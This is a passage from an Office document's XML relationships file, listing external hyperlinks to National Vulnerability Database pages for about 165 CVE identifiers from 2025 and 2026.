Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69826" TargetMode="External" Id="rId1984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69847" TargetMode="External" Id="rId1985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69875" TargetMode="External" Id="rId1986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69876" TargetMode="External" Id="rId1987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71312" TargetMode="External" Id="rId1988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76139" TargetMode="External" Id="rId1989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79755" TargetMode="External" Id="rId1990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83948" TargetMode="External" Id="rId1991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84934" TargetMode="External" Id="rId1992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84935" TargetMode="External" Id="rId1993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86140" TargetMode="External" Id="rId1994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-43133" TargetMode="External" Id="rId1995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-44629" TargetMode="External" Id="rId1996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6726" TargetMode="External" Id="rId1997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82636" TargetMode="External" Id="rId1998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85649" TargetMode="External" Id="rId1999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-48565" TargetMode="External" Id="rId2000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-48566" TargetMode="External" Id="rId2001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-5914" TargetMode="External" Id="rId2002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-6020" TargetMode="External" Id="rId2003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-61731" TargetMode="External" Id="rId2004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-7425" TargetMode="External" Id="rId2005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0065" TargetMode="External" Id="rId2006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0084" TargetMode="External" Id="rId2007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11332" TargetMode="External" Id="rId2008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-12410" TargetMode="External" Id="rId2009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15809" TargetMode="External" Id="rId2010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16826" TargetMode="External" Id="rId2011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17499" TargetMode="External" Id="rId2012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17523" TargetMode="External" Id="rId2013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19820" TargetMode="External" Id="rId2014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-2050" TargetMode="External" Id="rId2015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-2310" TargetMode="External" Id="rId2016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28572" TargetMode="External" Id="rId2017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28583" TargetMode="External" Id="rId2018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28590" TargetMode="External" Id="rId2019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28593" TargetMode="External" Id="rId2020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28594" TargetMode="External" Id="rId2021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28599" TargetMode="External" Id="rId2022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28600" TargetMode="External" Id="rId2023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28602" TargetMode="External" Id="rId2024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28603" TargetMode="External" Id="rId2025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28607" TargetMode="External" Id="rId2026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28611" TargetMode="External" Id="rId2027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28612" TargetMode="External" Id="rId2028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28614" TargetMode="External" Id="rId2029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28616" TargetMode="External" Id="rId2030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28620" TargetMode="External" Id="rId2031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28624" TargetMode="External" Id="rId2032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28631" TargetMode="External" Id="rId2033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28634" TargetMode="External" Id="rId2034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28636" TargetMode="External" Id="rId2035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28639" TargetMode="External" Id="rId2036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28642" TargetMode="External" Id="rId2037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28644" TargetMode="External" Id="rId2038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28650" TargetMode="External" Id="rId2039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28653" TargetMode="External" Id="rId2040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28655" TargetMode="External" Id="rId2041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28657" TargetMode="External" Id="rId2042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28658" TargetMode="External" Id="rId2043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28663" TargetMode="External" Id="rId2044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28664" TargetMode="External" Id="rId2045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-28668" TargetMode="External" Id="rId2046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30512" TargetMode="External" Id="rId2047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34398" TargetMode="External" Id="rId2048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34399" TargetMode="External" Id="rId2049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45200" TargetMode="External" Id="rId2050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45515" TargetMode="External" Id="rId2051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45520" TargetMode="External" Id="rId2052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45531" TargetMode="External" Id="rId2053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45998" TargetMode="External" Id="rId2054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46117" TargetMode="External" Id="rId2055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46145" TargetMode="External" Id="rId2056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-46189" TargetMode="External" Id="rId2057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48097" TargetMode="External" Id="rId2058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49360" TargetMode="External" Id="rId2059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49881" TargetMode="External" Id="rId2060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49884" TargetMode="External" Id="rId2061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49887" TargetMode="External" Id="rId2062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49918" TargetMode="External" Id="rId2063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49919" TargetMode="External" Id="rId2064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49927" TargetMode="External" Id="rId2065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49932" TargetMode="External" Id="rId2066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52489" TargetMode="External" Id="rId2067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52492" TargetMode="External" Id="rId2068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52987" TargetMode="External" Id="rId2069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53000" TargetMode="External" Id="rId2070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53009" TargetMode="External" Id="rId2071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53016" TargetMode="External" Id="rId2072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53185" TargetMode="External" Id="rId2073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54757" TargetMode="External" Id="rId2074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54758" TargetMode="External" Id="rId2075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55273" TargetMode="External" Id="rId2076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55285" TargetMode="External" Id="rId2077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55294" TargetMode="External" Id="rId2078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55426" TargetMode="External" Id="rId2079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55522" TargetMode="External" Id="rId2080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56172" TargetMode="External" Id="rId2081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56177" TargetMode="External" Id="rId2082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-56198" TargetMode="External" Id="rId2083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-57170" TargetMode="External" Id="rId2084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-5729" TargetMode="External" Id="rId2085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58097" TargetMode="External" Id="rId2086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58599" TargetMode="External" Id="rId2087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58600" TargetMode="External" Id="rId2088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58611" TargetMode="External" Id="rId2089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58820" TargetMode="External" Id="rId2090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58823" TargetMode="External" Id="rId2091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58839" TargetMode="External" Id="rId2092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58846" TargetMode="External" Id="rId2093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58874" TargetMode="External" Id="rId2094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-58941" TargetMode="External" Id="rId2095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62697" TargetMode="External" Id="rId2096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62804" TargetMode="External" Id="rId2097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62810" TargetMode="External" Id="rId2098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-62886" TargetMode="External" Id="rId2099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-63622" TargetMode="External" Id="rId2100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64372" TargetMode="External" Id="rId2101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64375" TargetMode="External" Id="rId2102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64377" TargetMode="External" Id="rId2103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64378" TargetMode="External" Id="rId2104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-64381" TargetMode="External" Id="rId2105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67309" TargetMode="External" Id="rId2106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67846" TargetMode="External" Id="rId2107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-67961" TargetMode="External" Id="rId2108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68508" TargetMode="External" Id="rId2109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68787" TargetMode="External" Id="rId2110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68832" TargetMode="External" Id="rId2111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68841" TargetMode="External" Id="rId2112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68844" TargetMode="External" Id="rId2113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68845" TargetMode="External" Id="rId2114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68848" TargetMode="External" Id="rId2115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68850" TargetMode="External" Id="rId2116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68875" TargetMode="External" Id="rId2117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68877" TargetMode="External" Id="rId2118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68885" TargetMode="External" Id="rId2119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68888" TargetMode="External" Id="rId2120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68890" TargetMode="External" Id="rId2121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68892" TargetMode="External" Id="rId2122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-68896" TargetMode="External" Id="rId2123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69265" TargetMode="External" Id="rId2124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69269" TargetMode="External" Id="rId2125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69270" TargetMode="External" Id="rId2126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69277" TargetMode="External" Id="rId2127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69283" TargetMode="External" Id="rId2128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69284" TargetMode="External" Id="rId2129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69289" TargetMode="External" Id="rId2130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69290" TargetMode="External" Id="rId2131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69293" TargetMode="External" Id="rId2132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69295" TargetMode="External" Id="rId2133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69298" TargetMode="External" Id="rId2134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69307" TargetMode="External" Id="rId2135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69312" TargetMode="External" Id="rId2136" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69323" TargetMode="External" Id="rId2137" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69324" TargetMode="External" Id="rId2138" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69328" TargetMode="External" Id="rId2139" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69348" TargetMode="External" Id="rId2140" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69352" TargetMode="External" Id="rId2141" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69359" TargetMode="External" Id="rId2142" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69368" TargetMode="External" Id="rId2143" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69377" TargetMode="External" Id="rId2144" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69389" TargetMode="External" Id="rId2145" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69391" TargetMode="External" Id="rId2146" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69392" TargetMode="External" Id="rId2147" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69407" TargetMode="External" Id="rId2148" /><Relationship 